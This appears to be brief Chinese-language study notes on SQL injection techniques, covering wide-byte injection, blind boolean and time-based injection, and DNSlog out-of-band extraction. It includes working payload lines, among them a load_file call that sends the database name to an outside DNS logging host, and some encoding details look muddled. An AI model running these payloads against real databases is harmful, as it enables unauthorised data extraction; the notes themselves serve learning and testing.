1. 宽字节注入
先看下编码
ascii码:英文字母 1个字节
gbk-GB2312 编码 支持中文 2个字节 0xdf0x5c – 運
utf8编码 可变长 3个字节 0xdf0x5c0x7b – 汉
unicode 万国码 4个字节
url编码
宽字节注入原理
有时候php 会把 符号加上/ ,我们利用编码把加上的/吃掉,变成一个汉字就可以完美注入了
2. 偏移量注入
3.加密注入
4.堆叠注入
5.二次注入
6.盲注
- 布尔盲注
首先判断数据库的长度 用到的函数是 length()
其次再次判断数据库名字的每个名字是哪个vince’ and ascii(substr(database(),1,1))=112#
全靠猜 - 时间盲注
select benchmark(1000,md5(123))
7.DNSlog
http://ceye.io
http://dnslog.cn
mysql>select load file('database().9fqiop.ceye.io\wbc’);
PS:盲注和dnslog注入都是针对无回显的